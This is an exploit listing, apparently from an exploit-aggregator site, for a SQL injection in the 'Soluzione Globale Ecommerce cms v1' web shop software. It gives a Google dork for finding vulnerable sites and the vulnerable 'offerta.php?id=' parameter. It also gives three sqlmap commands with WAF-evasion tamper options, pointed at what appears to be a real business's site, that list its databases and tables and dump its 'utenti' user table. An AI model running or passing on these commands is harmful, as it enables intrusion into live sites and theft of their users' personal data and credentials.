Share
## https://sploitus.com/exploit?id=1337DAY-ID-34161
# Exploit Title:  Soluzione Globale Ecommerce cms v1 SQL Injection Vulnerability
# Google Dork: intext:"  Soluzione Globale s.r.l.s.  " +inurl:/.php?id=
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.soluzioneglobale.com/
# Version: v1
# Tested on: Ubuntu

---------------------------------------------------------

PoC 1:
the attacker once locate the sql  vulnerability can perform an automated process to exploit the secruity in the webapp , in this case using sqlmap in 2 steps only  
*Note: once you get the db name you can skip the other steps and directly get "utenti" data (you can use command 1 and 3 ..below)

Payload(s)

http://www.site.com/offerta.php?id=[]'[SQL INJECTION VULNERABILITY!]

SQLMAP Payload(s):

sqlmap -u https://www.habitat-arredamenti.it/offerta.php?id=722 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u https://www.habitat-arredamenti.it/offerta.php?id=722 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D Sql1125953_1 --tables

sqlmap -u https://www.habitat-arredamenti.it/offerta.php?id=722 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D Sql1125953_1  -T utenti

#  0day.today [2020-03-30]  #